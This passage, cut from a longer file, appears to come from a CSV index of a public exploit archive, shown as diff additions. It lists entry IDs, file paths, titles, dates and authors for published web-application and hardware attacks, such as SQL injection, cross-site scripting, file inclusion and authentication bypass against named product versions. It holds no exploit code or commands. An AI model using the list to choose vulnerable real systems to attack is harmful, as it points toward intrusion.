Forgery",2013-03-19,"Jacob Holcomb",webapps,hardware, +24861,exploits/php/webapps/24861.txt,"Rebus:list - 'list.php?list_id' SQL Injection",2013-03-19,"Robert Cooper",webapps,php, +24862,exploits/php/webapps/24862.txt,"ViewGit 0.0.6 - Multiple Cross-Site Scripting Vulnerabilities",2013-03-19,"Matthew R. Bucci",webapps,php, +24864,exploits/hardware/webapps/24864.pl,"StarVedia IPCamera IC502w IC502w+ v020313 - 'Username'/Password Disclosure",2013-03-22,"Todor Donev",webapps,hardware, +24867,exploits/php/webapps/24867.html,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Multiple Vulnerabilities",2013-03-22,m3tamantra,webapps,php, +24868,exploits/php/webapps/24868.rb,"WordPress Plugin IndiaNIC FAQs Manager 1.0 - Blind SQL Injection",2013-03-22,m3tamantra,webapps,php, +24869,exploits/php/webapps/24869.txt,"AContent 1.3 - Local File Inclusion",2013-03-22,DaOne,webapps,php, +24870,exploits/php/webapps/24870.txt,"Flatnux CMS 2013-01.17 - 'index.php' Local File Inclusion",2013-03-22,DaOne,webapps,php, +24871,exploits/php/webapps/24871.txt,"Slash CMS - Multiple Vulnerabilities",2013-03-22,DaOne,webapps,php, +24873,exploits/php/webapps/24873.txt,"Stradus CMS 1.0beta4 - Multiple Vulnerabilities",2013-03-22,DaOne,webapps,php, +24877,exploits/php/webapps/24877.txt,"OpenCart 1.5.5.1 - 'FileManager.php' Directory Traversal Arbitrary File Access",2013-03-22,waraxe,webapps,php, +24879,exploits/php/webapps/24879.txt,"Free Hosting Manager 2.0.2 - Multiple SQL Injections",2013-03-25,"Saadi Siddiqui",webapps,php, +24881,exploits/php/webapps/24881.txt,"ClipShare 4.1.1 - 'gid' Blind SQL Injection",2013-03-25,Esac,webapps,php, +24882,exploits/php/webapps/24882.pl,"vBulletin 5.0.0 Beta 11 < 5.0.0 Beta 28 - SQL Injection",2013-03-25,"Orestis Kourides",webapps,php, +24883,exploits/php/webapps/24883.rb,"Ra1NX PHP Bot - pubcall Authentication Bypass Remote Code Execution (Metasploit)",2013-03-25,bwall,webapps,php, +24893,exploits/php/webapps/24893.txt,"PsychoStats 3.2.2b - 'awards.php' Blind SQL Injection",2013-03-27,"Mohamed from ALG",webapps,php, +24894,exploits/php/webapps/24894.txt,"ClipShare 4.1.1 - Multiples Vulnerabilities",2013-03-27,Esac,webapps,php, +24898,exploits/php/webapps/24898.txt,"SynConnect Pms - 'index.php?loginid' SQL Injection",2013-03-29,"Bhadresh Patel",webapps,php, +24901,exploits/windows/webapps/24901.txt,"MailOrderWorks 5.907 - Multiple Vulnerabilities",2013-03-29,Vulnerability-Lab,webapps,windows, +24906,exploits/php/webapps/24906.txt,"AWS Xms 2.5 - 'importer.php?what' Directory Traversal",2013-03-29,"High-Tech Bridge SA",webapps,php, +24911,exploits/php/webapps/24911.txt,"Pollen CMS 0.6 - 'index.php?p' Paramete' Local File Disclosure",2013-04-02,MizoZ,webapps,php, +24913,exploits/php/webapps/24913.txt,"Network Weathermap 0.97a - 'editor.php' Persistent Cross-Site Scripting",2013-04-02,"Daniel Ricardo dos Santos",webapps,php, +24914,exploits/php/webapps/24914.txt,"WordPress Plugin FuneralPress 1.1.6 - Persistent Cross-Site Scripting",2013-04-02,"Rob Armstrong",webapps,php, +24915,exploits/multiple/webapps/24915.txt,"Aspen 0.8 - Directory Traversal",2013-04-02,"Daniel Ricardo dos Santos",webapps,multiple, +24916,exploits/hardware/webapps/24916.txt,"NETGEAR WNR1000 - Authentication Bypass",2013-04-02,"Roberto Paleari",webapps,hardware, +24924,exploits/hardware/webapps/24924.txt,"Belkin Wemo - Arbitrary Firmware Upload",2013-04-08,"Daniel Buentello",webapps,hardware, +24926,exploits/hardware/webapps/24926.txt,"D-Link - Multiple Vulnerabilities",2013-04-08,m-1-k-3,webapps,hardware, +24927,exploits/php/webapps/24927.txt,"Vanilla Forums 2-0-18-4 - SQL Injection",2013-04-08,bl4ckw0rm,webapps,php, +24928,exploits/hardware/webapps/24928.txt,"TP-Link TD-8817 6.0.1 Build 111128 Rel.26763 - Cross-Site Request Forgery",2013-04-08,Un0wn_X,webapps,hardware, +24932,exploits/linux/webapps/24932.txt,"Sophos Web Protection Appliance 3.7.8.1 - Multiple Vulnerabilities",2013-04-08,"SEC Consult",webapps,linux, +24934,exploits/php/webapps/24934.txt,"WHMCompleteSolution (WHMCS) Group Pay Plugin 1.5 - 'grouppay.php?hash' SQL Injection",2013-04-08,"HJauditing Employee Tim",webapps,php, +24957,exploits/php/webapps/24957.txt,"Vanilla Forums Van2Shout Plugin 1.0.51 - Multiple Cross-Site Request Forgery Vulnerabilities",2013-04-15,"Henry Hoggard",webapps,php, +24969,exploits/php/webapps/24969.txt,"Joomla! Component com_civicrm 4.2.2 - Remote Code Injection",2013-04-22,iskorpitx,webapps,php, +24942,exploits/php/webapps/24942.txt,"ZAPms 1.41 - SQL Injection",2013-04-09,NoGe,webapps,php, +27434,exploits/php/webapps/27434.txt,"Oxynews - 'index.php' SQL Injection",2006-03-16,R00T3RR0R,webapps,php, +27435,exploits/php/webapps/27435.txt,"phpMyAdmin 2.8.1 - Set_Theme Cross-Site Scripting",2006-03-16,"Ali Asad",webapps,php, +27436,exploits/php/webapps/27436.txt,"Invision Power Services Invision Board 2.0.4 - Search Action Multiple Cross-Site Scripting Vulnerabilities",2006-03-17,Mr.SNAKE,webapps,php, +24953,exploits/php/webapps/24953.txt,"Free Monthly Websites 2.0 - Admin Password Change",2013-04-12,"Yassin Aboukir",webapps,php, +24954,exploits/php/webapps/24954.txt,"Simple HRM System 2.3 - Multiple Vulnerabilities",2013-04-12,Doraemon,webapps,php, +24959,exploits/php/webapps/24959.txt,"CMSLogik 1.2.1 - Multiple Vulnerabilities",2013-04-15,LiquidWorm,webapps,php, +24960,exploits/php/webapps/24960.txt,"phpVms Virtual Airline Administration 2.1.934/2.1.935 - SQL Injection",2013-04-15,NoGe,webapps,php, +24964,exploits/windows/webapps/24964.txt,"Oracle WebCenter Sites Satellite Server - HTTP Header Injection",2013-04-18,"SEC Consult",webapps,windows, +24965,exploits/php/webapps/24965.txt,"KrisonAV CMS 3.0.1 - Multiple Vulnerabilities",2013-04-18,"High-Tech Bridge SA",webapps,php, +24967,exploits/multiple/webapps/24967.txt,"Nginx 0.6.x - Arbitrary Code Execution NullByte Injection",2013-04-19,"Neal Poole",webapps,multiple, +25090,exploits/php/webapps/25090.txt,"XGB 2.0 - Authentication Bypass",2005-02-08,"Albania Security Clan",webapps,php, +25816,exploits/php/webapps/25816.txt,"Ovidentia FX - Remote File Inclusion",2005-06-10,Status-x,webapps,php, +25817,exploits/cgi/webapps/25817.txt,"JamMail 1.8 - Jammail.pl Arbitrary Command Execution",2005-06-12,blahplok,webapps,cgi, +25818,exploits/php/webapps/25818.txt,"Singapore 0.9.11 Beta Image Gallery - 'index.php' Cross-Site Scripting",2005-06-13,TheGreatOne2176,webapps,php, +24973,exploits/php/webapps/24973.txt,"VoipNow 2.5 - Local File Inclusion",2013-04-22,i-Hmx,webapps,php, +24975,exploits/hardware/webapps/24975.txt,"D-Link DIR-615 Rev D3 / DIR-300 Rev A - Multiple Vulnerabilities",2013-04-23,m-1-k-3,webapps,hardware, +25089,exploits/php/webapps/25089.txt,"PHP-Fusion 4.0 - 'Viewthread.php' Information Disclosure",2005-02-08,TheGreatOne2176,webapps,php, +24986,exploits/cgi/webapps/24986.txt,"IkonBoard 3.x - Multiple SQL Injections",2004-12-16,anonymous,webapps,cgi, +24987,exploits/php/webapps/24987.txt,"JSBoard 2.0.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",webapps,php, +24988,exploits/php/webapps/24988.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/post.php?content' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",webapps,php, +24989,exploits/php/webapps/24989.txt,"WordPress 1.2.1/1.2.2 - '/wp-admin/templates.php?file' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",webapps,php, +24990,exploits/php/webapps/24990.txt,"WordPress 1.2.1/1.2.2 - 'link-add.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-16,"Thomas Waldegger",webapps,php, +24991,exploits/php/webapps/24991.txt,"WordPress 1.2.1/1.2.2 - 'link-categories.php?cat_id' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",webapps,php, +24992,exploits/php/webapps/24992.txt,"WordPress 1.2.1/1.2.2 - 'link-manager.php' Multiple Cross-Site Scripting Vulnerabilities",2004-12-16,"Thomas Waldegger",webapps,php, +24993,exploits/php/webapps/24993.txt,"WordPress 1.2.1/1.2.2 - 'moderation.php?item_approved' Cross-Site Scripting",2004-12-16,"Thomas Waldegger",webapps,php, +24994,exploits/php/webapps/24994.txt,"MediaWiki 1.3.x - Arbitrary Script Upload",2004-12-16,"Jeremy Bae",webapps,php, +25184,exploits/php/webapps/25184.txt,"ProjectBB 0.4.5.1 - Multiple SQL Injections",2005-03-02,"benji lemien",webapps,php, +25185,exploits/php/webapps/25185.txt,"D-Forum 1.11 - 'Nav.php3' Cross-Site Scripting",2005-03-03,benjilenoob,webapps,php, +25186,exploits/php/webapps/25186.txt,"Typo3 CMW_Linklist 1.4.1 Extension - SQL Injection",2005-03-03,"Fabian Becker",webapps,php, +25189,exploits/php/webapps/25189.txt,"Stadtaus.Com Download Center Lite 1.5 - PHP Remote File Inclusion",2005-03-04,"Filip Groszynski",webapps,php, +25192,exploits/php/webapps/25192.pl,"Stadtaus.Com PHP Form Mail Script 2.3 - Remote File Inclusion",2005-03-05,mozako,webapps,php, +25193,exploits/php/webapps/25193.txt,"Jason Hines PHPWebLog 0.4/0.5 - Remote File Inclusion",2005-03-07,"Filip Groszynski",webapps,php, +29278,exploits/php/webapps/29278.pl,"Work System eCommerce 3.0.3/3.0.4 - 'forum.php' Remote File Inclusion",2006-12-13,the_Edit0r,webapps,php, +25002,exploits/php/webapps/25002.txt,"Hornbill Supportworks ITSM 1.0.0 - SQL Injection",2013-04-25,"Joseph Sheridan",webapps,php, +25003,exploits/php/webapps/25003.txt,"phpMyAdmin 3.5.8/4.0.0-RC2 - Multiple Vulnerabilities",2013-04-25,waraxe,webapps,php, +25014,exploits/php/webapps/25014.txt,"WorkBoard 1.2 - Multiple Cross-Site Scripting Vulnerabilities",2004-12-17,Lostmon,webapps,php, +25183,exploits/php/webapps/25183.txt,"ProjectBB 0.4.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-02,"benji lemien",webapps,php, +25024,exploits/hardware/webapps/25024.txt,"D-Link DIR-635 - Multiple Vulnerabilities",2013-04-26,m-1-k-3,webapps,hardware, +25037,exploits/php/webapps/25037.txt,"Kayako eSupport 2.x - 'index.php' Knowledgebase Cross-Site Scripting",2004-12-18,"James Bercegay",webapps,php, +25038,exploits/php/webapps/25038.txt,"Kayako eSupport 2.x - Ticket System Multiple SQL Injections",2004-12-18,"James Bercegay",webapps,php, +25041,exploits/cgi/webapps/25041.txt,"escripts software e_board 4.0 - Directory Traversal",2004-12-20,white_e@nogimmick.org,webapps,cgi, +25042,exploits/cgi/webapps/25042.txt,"Tlen.pl 5.23.4.1 - Instant Messenger Remote Script Execution",2004-12-20,"Jaroslaw Sajko",webapps,cgi, +25043,exploits/php/webapps/25043.txt,"phpGroupWare 0.9.14 - 'Tables_Update.Inc.php' Remote File Inclusion",2004-01-27,"Cedric Cochin",webapps,php, +25044,exploits/php/webapps/25044.txt,"phpGroupWare 0.9.x - 'index.php' HTML Injection",2004-01-27,"Cedric Cochin",webapps,php, +25045,exploits/php/webapps/25045.txt,"2BGal 2.5.1 - SQL Injection",2004-12-22,zib,webapps,php, +25051,exploits/cgi/webapps/25051.txt,"Wirtualna Polska WPKontakt 3.0.1 - Remote Script Execution",2004-12-23,"Poznan Supercomputing",webapps,cgi, +25052,exploits/php/webapps/25052.pl,"Siteman 1.1 - User Database Privilege Escalation (1)",2005-01-19,"Noam Rathaus",webapps,php, +25053,exploits/php/webapps/25053.html,"Siteman 1.1 - User Database Privilege Escalation (2)",2005-01-19,amironline452,webapps,php, +25058,exploits/php/webapps/25058.txt,"Exponent CMS 0.95 - Multiple Cross-Site Scripting Vulnerabilities",2005-12-25,y3dips,webapps,php, +25059,exploits/php/webapps/25059.txt,"MercuryBoard 1.1 - Multiple Input Validation Vulnerabilities",2005-01-25,"Alberto Trivero",webapps,php, +25060,exploits/asp/webapps/25060.txt,"Comersus Cart 5.0/6.0 - Multiple Vulnerabilities",2005-01-25,"raf somers",webapps,asp, +25062,exploits/php/webapps/25062.txt,"Comdev eCommerce 3.0 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2005-01-25,SmOk3,webapps,php, +25064,exploits/php/webapps/25064.txt,"Magic Winmail Server 4.0 (Build 1112) - 'download.php' Traversal Arbitrary File Access",2005-01-27,"Tan Chew Keong",webapps,php, +25065,exploits/php/webapps/25065.txt,"Magic Winmail Server 4.0 (Build 1112) - 'upload.php' Traversal Arbitrary File Upload",2005-01-27,"Tan Chew Keong",webapps,php, +25067,exploits/cgi/webapps/25067.txt,"alt-n WebAdmin 3.0.2 - Multiple Vulnerabilities",2005-01-28,"David A. P?rez",webapps,cgi, +25068,exploits/php/webapps/25068.txt,"IceWarp Web Mail 5.3 - login.html 'Username' Cross-Site Scripting",2005-01-28,ShineShadow,webapps,php, +25069,exploits/php/webapps/25069.txt,"IceWarp Web Mail 5.3 - 'accountsettings_add.html?accountid' Cross-Site Scripting",2005-01-28,ShineShadow,webapps,php, +25071,exploits/php/webapps/25071.txt,"Captaris Infinite Mobile Delivery Webmail 2.6 - Full Path Disclosure",2005-01-29,steven@lovebug.org,webapps,php, +25074,exploits/php/webapps/25074.txt,"XOOPS Module module 3.0 - Directory Traversal",2005-01-28,Lostmon,webapps,php, +25078,exploits/asp/webapps/25078.txt,"Eurofull E-Commerce - 'Mensresp.asp' Cross-Site Scripting",2005-02-02,Yani-ari,webapps,asp, +25084,exploits/asp/webapps/25084.txt,"Microsoft Outlook 2003 - Web Access Login Form Remote URI redirection",2005-02-07,"Morning Wood",webapps,asp, +25086,exploits/windows/webapps/25086.pl,"Ipswitch IMail 11.01 - Cross-Site Scripting",2013-04-29,DaOne,webapps,windows, +25087,exploits/php/webapps/25087.txt,"Joomla! 3.0.3 - 'remember.php' PHP Object Injection",2013-04-26,EgiX,webapps,php, +25088,exploits/php/webapps/25088.txt,"Foe CMS 1.6.5 - Multiple Vulnerabilities",2013-04-29,flux77,webapps,php, +25093,exploits/php/webapps/25093.txt,"MercuryBoard 1.1 - 'index.php' SQL Injection",2005-02-09,Zeelock,webapps,php, +25096,exploits/cgi/webapps/25096.txt,"AWStats 5.x/6.x - Debug Remote Information Disclosure",2005-02-14,GHC,webapps,cgi, +25097,exploits/php/webapps/25097.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php?language' Cross-Site Scripting",2005-02-14,"John Cobb",webapps,php, +25098,exploits/php/webapps/25098.txt,"Brooky CubeCart 2.0.1/2.0.4 - 'index.php?language' Traversal Arbitrary File Access",2005-02-14,"John Cobb",webapps,php, +25099,exploits/php/webapps/25099.txt,"CitrusDB 0.3.6 - 'importcc.php' Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",webapps,php, +25100,exploits/php/webapps/25100.txt,"CitrusDB 0.3.6 - 'uploadcc.php' Arbitrary Database Injection",2005-02-15,"RedTeam Pentesting",webapps,php, +25101,exploits/php/webapps/25101.txt,"CitrusDB 0.3.6 - 'importcc.php' CSV File SQL Injection",2005-02-15,"RedTeam Pentesting",webapps,php, +25102,exploits/php/webapps/25102.txt,"CitrusDB 0.3.6 - Remote Authentication Bypass",2004-02-15,"RedTeam Pentesting",webapps,php, +25103,exploits/php/webapps/25103.txt,"PHP-Nuke 6.x/7.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-15,waraxe,webapps,php, +25104,exploits/php/webapps/25104.txt,"CitrusDB 0.3.6 - Arbitrary Local PHP File Inclusion",2005-02-15,"RedTeam Pentesting",webapps,php, +25105,exploits/php/webapps/25105.txt,"osCommerce 2.2 - 'Contact_us.php' Cross-Site Scripting",2005-02-15,"John Cobb",webapps,php, +25108,exploits/cgi/webapps/25108.txt,"AWStats 5.x/6.x - 'Logfile' Remote Command Execution",2005-02-16,newbug@chroot.org,webapps,cgi, +25109,exploits/php/webapps/25109.txt,"DCP-Portal 6.1.1 - Multiple SQL Injections",2005-02-16,Exoduks,webapps,php, +25110,exploits/asp/webapps/25110.txt,"Microsoft ASP.NET 1.0/1.1 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-16,"Andrey Rusyaev",webapps,asp, +25111,exploits/php/webapps/25111.txt,"PaNews 2.0 - Cross-Site Scripting",2005-02-16,pi3ch,webapps,php, +25112,exploits/php/webapps/25112.txt,"MercuryBoard Forum 1.0/1.1 - Cross-Site Scripting",2005-02-16,Lostmon,webapps,php, +25113,exploits/php/webapps/25113.txt,"WebCalendar 0.9.45 - SQL Injection",2005-02-17,"Michael Scovetta",webapps,php, +25114,exploits/php/webapps/25114.txt,"paFaq beta4 - 'question.php' Multiple SQL Injections",2005-02-17,pi3ch,webapps,php, +25115,exploits/php/webapps/25115.txt,"paFaq beta4 - 'answer.php?offset' SQL Injection",2005-02-17,pi3ch,webapps,php, +25116,exploits/php/webapps/25116.txt,"paFaq beta4 - 'search.php?search_item' SQL Injection",2005-02-17,pi3ch,webapps,php, +25117,exploits/php/webapps/25117.txt,"paFaq beta4 - 'comment.php' Multiple SQL Injections",2005-02-17,pi3ch,webapps,php, +25118,exploits/php/webapps/25118.txt,"BibORB 1.3.2 - 'bibindex.php?search' Cross-Site Scripting",2005-02-17,"Patrick Hof",webapps,php, +25119,exploits/php/webapps/25119.txt,"BibORB 1.3.2 - Add Database 'Description' Cross-Site Scripting",2005-02-17,"Patrick Hof",webapps,php, +25120,exploits/php/webapps/25120.txt,"BibORB 1.3.2 - 'index.php' Traversal Arbitrary File Manipulation",2005-02-17,"Patrick Hof",webapps,php, +25121,exploits/php/webapps/25121.txt,"BibORB 1.3.2 Login Module - Multiple SQL Injections",2005-02-17,"Patrick Hof",webapps,php, +25123,exploits/php/webapps/25123.txt,"TrackerCam 5.12 - ''ComGetLogFile.php3?fm' Traversal Arbitrary File Access",2005-02-18,"Luigi Auriemma",webapps,php, +25125,exploits/php/webapps/25125.txt,"ZeroBoard 4.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-02-19,"albanian haxorz",webapps,php, +25126,exploits/php/webapps/25126.txt,"EggBlog 4.1.2 - Arbitrary File Upload",2013-05-01,Pokk3rs,webapps,php, +25127,exploits/php/webapps/25127.txt,"PMachine Pro 2.4 - Remote File Inclusion",2005-02-19,kc,webapps,php, +25138,exploits/hardware/webapps/25138.txt,"D-Link IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",webapps,hardware, +25139,exploits/hardware/webapps/25139.txt,"Vivotek IP Cameras - Multiple Vulnerabilities",2013-05-01,"Core Security",webapps,hardware, +25142,exploits/hardware/webapps/25142.txt,"D-Link DNS-323 - Multiple Vulnerabilities",2013-05-02,sghctoma,webapps,hardware, +25143,exploits/php/webapps/25143.txt,"Invision Power Board 1.x/2.0.3 - SML Code Script Injection",2005-02-21,"Daniel A.",webapps,php, +25145,exploits/php/webapps/25145.txt,"PANews 2.0 - PHP Remote Code Execution",2005-02-21,tjomka,webapps,php, +25147,exploits/cgi/webapps/25147.txt,"Biz Mail Form 2.x - Unauthorized Mail Relay",2005-02-22,"Jason Frisvold",webapps,cgi, +25148,exploits/asp/webapps/25148.txt,"Mono 1.0.5 - Unicode Character Conversion Multiple Cross-Site Scripting Vulnerabilities",2005-02-22,"Andrey Rusyaev",webapps,asp, +25149,exploits/php/webapps/25149.txt,"iGeneric iG Shop 1.x - Multiple SQL Injections",2005-02-22,"John Cobb",webapps,php, +25151,exploits/php/webapps/25151.txt,"PBLang Bulletin Board System 4.6 - 'search.php' Cross-Site Scripting",2005-02-23,"Hackerlounge Research Group",webapps,php, +25152,exploits/php/webapps/25152.txt,"phpMyAdmin 2.6 - 'select_server.lib.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",webapps,php, +25153,exploits/php/webapps/25153.txt,"phpMyAdmin 2.6 - 'display_tbl_links.lib.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",webapps,php, +25154,exploits/php/webapps/25154.txt,"phpMyAdmin 2.6 - 'theme_left.css.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",webapps,php, +25155,exploits/php/webapps/25155.txt,"phpMyAdmin 2.6 - 'theme_right.css.php' Multiple Cross-Site Scripting Vulnerabilities",2005-02-24,"Maksymilian Arciemowicz",webapps,php, +25156,exploits/php/webapps/25156.txt,"phpMyAdmin 2.6 - Multiple Local File Inclusions",2005-02-24,"Maksymilian Arciemowicz",webapps,php, +25158,exploits/php/webapps/25158.txt,"OOApp Guestbook - Multiple HTML Injection Vulnerabilities",2005-02-24,m1o1d1,webapps,php, +25159,exploits/jsp/webapps/25159.txt,"cyclades alterpath manager 1.1 - Multiple Vulnerabilities",2005-02-24,sullo@cirt.net,webapps,jsp, +25160,exploits/php/webapps/25160.txt,"PunBB 3.0/3.1 - Multiple Remote Input Validation Vulnerabilities",2005-02-24,"John Gumbel",webapps,php, +25161,exploits/php/webapps/25161.txt,"phpWebSite 0.x - Image File Processing Arbitrary '.PHP' File Upload",2005-02-24,tjomka,webapps,php, +25162,exploits/php/webapps/25162.txt,"CubeCart 2.0.x - Multiple Cross-Site Scripting Vulnerabilities",2005-02-25,Lostmon,webapps,php, +25168,exploits/php/webapps/25168.c,"phpBB 2.0.x - Authentication Bypass (1)",2005-02-28,Paisterist,webapps,php, +25169,exploits/php/webapps/25169.pl,"phpBB 2.0.x - Authentication Bypass (2)",2005-02-28,phuket,webapps,php, +25170,exploits/php/webapps/25170.cpp,"phpBB 2.0.x - Authentication Bypass (3)",2005-02-28,overdose,webapps,php, +25172,exploits/php/webapps/25172.txt,"PostNuke Phoenix 0.7x - 'CATID' SQL Injection",2005-02-28,"Maksymilian Arciemowicz",webapps,php, +25173,exploits/php/webapps/25173.txt,"PostNuke Phoenix 0.7x - 'SHOW' SQL Injection",2005-02-28,"Maksymilian Arciemowicz",webapps,php, +25174,exploits/php/webapps/25174.txt,"PHPCOIN 1.2 - 'mod.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,webapps,php, +25175,exploits/php/webapps/25175.txt,"PHPCOIN 1.2 - 'login.php' Multiple Cross-Site Scripting Vulnerabilities",2005-03-01,Lostmon,webapps,php, +25176,exploits/php/webapps/25176.txt,"PBLang Bulletin Board System 4.x - 'SendPM.php' Directory Traversal",2005-03-01,Raven,webapps,php, +25177,exploits/php/webapps/25177.txt,"CutePHP CuteNews 1.3.6 - 'x-forwarded-for' Script Injection",2005-03-01,FraMe,webapps,php, +25178,exploits/php/webapps/25178.txt,"427BB 2.x - Multiple Remote HTML Injection Vulnerabilities",2005-03-01,"Hackerlounge Research Group",webapps,php, +25179,exploits/php/webapps/25179.txt,"PBLang Bulletin Board System 4.x - 'DelPM.php' Arbitrary Personal Message Deletion",2005-03-01,Raven,webapps,php, +25180,exploits/php/webapps/25180.py,"PHPNews 1.2.3/1.2.4 - 'auth.php' Remote File Inclusion",2005-03-01,mozako,webapps,php, +25197,exploits/php/webapps/25197.txt,"PHP-Fusion 5.0 - BBCode IMG Tag Script Injection",2005-03-08,FireSt0rm,webapps,php, +25198,exploits/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,webapps,jsp, +25199,exploits/php/webapps/25199.txt,"YaBB 2.0 - Remote UsersRecentPosts Cross-Site Scripting",2005-03-08,trueend5,webapps,php, +25200,exploits/php/webapps/25200.txt,"PHP Arena PAFileDB 3.1 - Multiple Cross-Site Scripting Vulnerabilities",2005-03-08,sp3x@securityreason.com,webapps,php, +25201,exploits/cgi/webapps/25201.txt,"Newsscript - Access Validation",2005-03-08,adrianc23@gmail.com,webapps,cgi, +25206,exploits/php/webapps/25206.txt,"phpoutsourcing zorum 3.5 - Multiple Vulnerabilities",2005-03-10,benjilenoob,webapps,php, +25208,exploits/php/webapps/25208.txt,"All Enthusiast PhotoPost PHP Pro 5.0 - 'adm-photo.php' Arbitrary Image Manipulation",2005-03-10,"Igor Franchuk",webapps,php, +25212,exploits/php/webapps/25212.txt,"UBBCentral UBB.Threads 6.0 - 'editpost.php' SQL Injection",2005-03-11,"ADZ Security Team",webapps,php, +25213,exploits/php/webapps/25213.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'viewall.php?start' SQL Injection",2005-03-12,sp3x@securityreason.com,webapps,php, +25214,exploits/php/webapps/25214.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'category.php?start' SQL Injection",2005-03-12,sp3x@securityreason.com,webapps,php, +25215,exploits/php/webapps/25215.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'viewall.php?start' Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,webapps,php, +25216,exploits/php/webapps/25216.txt,"PAFileDB 1.1.3/2.1.1/3.0/3.1 - 'category.php?start' Cross-Site Scripting",2005-03-12,sp3x@securityreason.com,webapps,php, +25217,exploits/php/webapps/25217.html,"HolaCMS 1.2/1.4.x Voting Module - Remote File Corruption",2005-03-12,"Virginity Security",webapps,php, +25220,exploits/php/webapps/25220.txt,"PABox 2.0 - Post Icon HTML Injection",2005-03-14,Rift_XT,webapps,php, +25222,exploits/php/webapps/25222.html,"HolaCMS 1.2.x/1.4.x Voting Module - Directory Traversal Remote File Corruption",2005-03-13,"Virginity Security",webapps,php, +25223,exploits/php/webapps/25223.txt,"Phorum 5.0.14 - Multiple Subject and Attachment HTML Injection Vulnerabilities",2005-03-14,"Jon Oberheide",webapps,php, +25224,exploits/php/webapps/25224.txt,"SimpGB 1.0 - 'Guestbook.php' SQL Injection",2005-03-14,visus,webapps,php, +25225,exploits/php/webapps/25225.txt,"PHPAdsNew 2.0.4 - 'AdFrame.php' Cross-Site Scripting",2005-03-14,"Maksymilian Arciemowicz",webapps,php, +25226,exploits/php/webapps/25226.txt,"VoteBox 2.0 - 'Votebox.php' Remote File Inclusion",2005-03-14,SmOk3,webapps,php, +25227,exploits/php/webapps/25227.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc_loginform.php?phpbb_root_path' Remote File Inclusion",2005-03-15,"Albania Security Clan",webapps,php, +25228,exploits/php/webapps/25228.txt,"PHPOpenChat 2.3.4/3.0.1 - 'poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",webapps,php, +25229,exploits/php/webapps/25229.txt,"PHPOpenChat 2.3.4/3.0.1 - 'ENGLISH_poc.php' Remote File Inclusion",2005-03-15,"Albania Security Clan",webapps,php, +25230,exploits/php/webapps/25230.txt,"PunBB 1.2.3 - Multiple HTML Injection Vulnerabilities",2005-03-16,"benji lemien",webapps,php, +25232,exploits/php/webapps/25232.txt,"McNews 1.x - 'install.php' Arbitrary File Inclusion",2005-03-17,"Jonathan Whiteley",webapps,php, +25233,exploits/asp/webapps/25233.txt,"ACS Blog 0.8/0.9/1.0/1.1 - 'search.asp' Cross-Site Scripting",2005-03-17,"farhad koosha",webapps,asp, +25235,exploits/php/webapps/25235.txt,"Subdreamer 1.0 - SQL Injection",2005-03-18,"GHC team",webapps,php, +25236,exploits/php/webapps/25236.html,"PHPOpenChat 3.0.1 - Multiple HTML Injection Vulnerabilities",2005-03-18,"PersianHacker Team",webapps,php, +25237,exploits/php/webapps/25237.txt,"RunCMS 1.1 - Database Configuration Information Disclosure",2005-03-18,"Majid NT",webapps,php, +25239,exploits/php/webapps/25239.txt,"CoolForum 0.5/0.7/0.8 - 'avatar.php?img' Cross-Site Scripting",2005-03-19,Romano,webapps,php, +25240,exploits/php/webapps/25240.txt,"CoolForum 0.5/0.7/0.8 - 'register.php?login' SQL Injection",2005-03-19,Romano,webapps,php, +25241,exploits/php/webapps/25241.html,"PHP-Fusion 4/5 - 'Setuser.php' HTML Injection",2005-03-19,"PersianHacker Team",webapps,php, +25242,exploits/php/webapps/25242.txt,"Ciamos 0.9.2 - 'Highlight.php' File Disclosure",2005-03-19,"Majid NT",webapps,php, +40397,exploits/aspx/webapps/40397.txt,"MuM MapEdit 3.2.6.0 - Multiple Vulnerabilities",2016-09-19,"Paul Baade & Sven Krewitt",webapps,aspx, +25243,exploits/php/webapps/25243.txt,"TRG News 3.0 Script - Remote File Inclusion",2005-03-21,Frank_Reiner,webapps,php, +25244,exploits/php/webapps/25244.txt,"CzarNews 1.13/1.14 - 'headlines.php' Remote File Inclusion",2005-03-21,brOmstar,webapps,php, +25245,exploits/php/webapps/25245.txt,"Social Site Generator 2.2 - Cross-Site Request Forgery (Add Admin)",2013-05-06,Fallaga,webapps,php, +25247,exploits/php/webapps/25247.txt,"Craigslist Gold - SQL Injection",2013-05-06,Fallaga,webapps,php, +25248,exploits/php/webapps/25248.txt,"Joomla! Component dj-classifieds 2.0 - Blind SQL Injection",2013-05-06,Napsterakos,webapps,php, +25249,exploits/php/webapps/25249.txt,"WeBid 1.0.6 - Multiple Vulnerabilities",2013-05-06,"Ahmed Aboul-Ela",webapps,php, +25250,exploits/php/webapps/25250.txt,"OpenDocMan 1.2.6.5 - Persistent Cross-Site Scripting",2013-05-06,drone,webapps,php, +25251,exploits/hardware/webapps/25251.txt,"D-Link DSL-320B - Multiple Vulnerabilities",2013-05-06,m-1-k-3,webapps,hardware, 